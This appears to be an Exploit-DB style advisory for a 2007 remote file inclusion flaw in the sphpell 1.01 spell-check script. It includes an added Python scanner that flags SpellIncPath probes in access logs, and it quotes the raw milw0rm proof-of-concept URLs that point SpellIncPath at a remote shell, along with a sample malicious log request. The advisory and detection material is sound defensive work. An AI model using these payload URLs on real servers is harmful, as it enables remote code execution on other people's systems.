Vendor: sphpell
By: Bulan: Cyber-security // Cyber-security.org
CVSS: 7.5 (HIGH)
CWE: Remote File Inclusion
Product Name: sphpell
Affected Version From: 01.01
Affected Version To: 01.01
Patch Exists: NO
2007

sphpell – 1.01 Remote File Include

The sphpell 1.01 script is vulnerable to remote file inclusion. The vulnerability exists in the spellcheckpageinc.php, spellchecktext.php, spellcheckwindow.php, and spellcheckwindowframeset.php files. An attacker can include arbitrary remote files by manipulating the SpellIncPath parameter in the URL.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of the sphpell script. Additionally, proper input validation and sanitization should be implemented to prevent remote file inclusion attacks.
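
To check whether the four scripts above have already been probed, the following added example (not part of the advisory or of sphpell) scans web server access logs for requests that set SpellIncPath in the query string. It assumes Combined Log Format, and it assumes that legitimate use never passes SpellIncPath in the URL; the sample lines, hostnames and the /sphpell/ path are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# The four scripts and the parameter named in the advisory.
SCRIPTS = {"spellcheckpageinc.php", "spellchecktext.php",
           "spellcheckwindow.php", "spellcheckwindowframeset.php"}
PARAM = "SpellIncPath"
# Request field of a Combined Log Format line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# A value that starts with a URL scheme ("http:", "ftp:", ...), "//" or a UNC prefix.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*:|//|\\\\)', re.I)

def classify(line):
    """Return None, "param-set" or "remote-include" for one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if parts.path.rsplit("/", 1)[-1].lower() not in SCRIPTS:
        return None
    verdict = None
    # parse_qsl percent-decodes names and values once, as the server does.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name != PARAM:
            continue
        verdict = verdict or "param-set"
        # Decode once more so a double-encoded value is not missed.
        if REMOTE_RE.match(value) or REMOTE_RE.match(unquote(value)):
            verdict = "remote-include"
    return verdict

def scan(lines):
    """Return (line_number, verdict) for every flagged line."""
    found = ((n, classify(line)) for n, line in enumerate(lines, 1))
    return [(n, v) for n, v in found if v]

# Constructed sample lines (documentation IP ranges, hypothetical /sphpell/ path).
SAMPLE_LOG = [
    '203.0.113.9 - - [30/Jun/2007:10:01:02 +0000] "GET /sphpell/spellchecktext.php?SpellIncPath=http%3A%2F%2Ffiles.example%2Finc%2F HTTP/1.1" 200 512',
    '203.0.113.9 - - [30/Jun/2007:10:01:05 +0000] "GET /sphpell/spellcheckwindow.php?SpellIncPath=inc/ HTTP/1.1" 200 512',
    '198.51.100.4 - - [30/Jun/2007:10:02:00 +0000] "GET /sphpell/spellcheckwindow.php?lang=en HTTP/1.1" 200 2048',
    '198.51.100.4 - - [30/Jun/2007:10:02:09 +0000] "GET /index.php?SpellIncPath=http://files.example/ HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for number, verdict in scan(SAMPLE_LOG):
        print(number, verdict)
```

Access logs record only the query string, so a value supplied in a POST body or cookie will not appear here and needs application-level or WAF logging.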

Exploit-DB raw data:

sphpell - 1.01 Remote File Include
---------------------------------------------------------------------------------
Bulan: Cyber-security // Cyber-security.org
---------------------------------------------------------------------------------
script download: http://sourceforge.net/project/showfiles.php?group_id=82330

---------------------------------------------------------------------------------
ERROR [1];spellcheckpageinc.php?

              include($SpellIncPath."spellcheckvars.php");

BUG:       www.target.com/checkpageinc.php?SpellIncPath=5h3LL
---------------------------------------------------------------------------------
ERROR [2];spellchecktext.php?

                   include($SpellIncPath."spellcheckvars.php");

BUG:       www.target.com/spellchecktext.php?SpellIncPath=5h3LL
---------------------------------------------------------------------------------
ERROR [3];spellcheckwindow.php?

                        include($SpellIncPath."spellcheckvars.php");

BUG:       www.target.com/spellcheckwindow.php?SpellIncPath=5h3LL
---------------------------------------------------------------------------------
ERROR [4];spellcheckwindowframeset.php?

                     include($SpellIncPath."spellcheckvars.php");

BUG:       www.target.com/spellcheckwindowframeset.php?SpellIncPath=5h3LL

---------------------------------------------------------------------------------
d0rk: :(

# milw0rm.com [2007-06-30]